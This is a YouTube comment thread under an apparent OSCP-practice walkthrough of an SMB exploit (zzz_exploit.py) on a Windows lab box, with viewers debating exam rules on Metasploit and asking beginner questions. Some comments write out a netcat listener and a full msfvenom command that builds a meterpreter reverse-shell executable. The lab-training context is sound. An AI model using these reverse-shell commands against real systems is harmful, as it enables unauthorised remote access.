I thought this was a walkthrough without using Metasploit?
@ithinkv5 жыл бұрын
Also, you mentioned you wouldn't use Metasploit, but meterpreter through metasploit is still banned in OSCP I believe?
@riverfallon67844 жыл бұрын
no. You may use meterpreter and metasploit on one machine
@e1Pr0f3ss0r4 жыл бұрын
Why u hvnt used netcat for reverse shell... instead of using windows/meterpreter/reverse..........?
@cabrex58644 жыл бұрын
OSCP bans the usage of a meterpreter session, you could just use a listener using the command "nc -nlvp 4444" which would give you shell access right? its also permitted by OSCP also msfvenom is not banned by OSCP am I right?
@tallst14 жыл бұрын
CABREX msfvenom is allowed
@tallst14 жыл бұрын
@D Barbarian meterpreter is not allowed but you can use the multi/handler just for listening.
@AllenGaming.4 жыл бұрын
how do you go back and forth from the search you did with /smb_send and editing the file? and how do exit and save the file
@commonemail5665 жыл бұрын
how did you know that you need to use "ntsvcs" at the end ???
@demiscuzz64274 жыл бұрын
I would like to know aswell?? any idea?
@ithinkv5 жыл бұрын
Why did you add // to the username?
@reuben36483 жыл бұрын
Do you have the answer?
@dylbert1404853 жыл бұрын
@@reuben3648 SMB anonymous login
@Saw-o3h4 жыл бұрын
You mentioned it would be without metasploit 😑
@yourlama572 жыл бұрын
“In the script, you need to put 2 slashes as the username because that’s what I put”
@YA-hx5dz3 жыл бұрын
Sir, i could follow your steps, but how can i know how to edit files such as zzz_exploit.py I am just beginner, and my mind is going to explode
@Mustangyeo2 жыл бұрын
Your explanations are clear. Thank you
@erdinczorlu53984 жыл бұрын
what is password
@crispusattucks60944 жыл бұрын
I think I remember doing this box with a pre-compiled exploit. Didn't have to fuss with changing much.
@bibeksapkota5114 жыл бұрын
Dont use the word OSCP if you are using Meterpreter Waste of time
@ITSecurityLabs4 жыл бұрын
Relax dude. Of all 33 videos in this series this is the one with metasploit. Besides , it is allowed on one box during the OSCP
@YA-hx5dz3 жыл бұрын
msfvenom worked for me only with: msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe > meterpreter.exe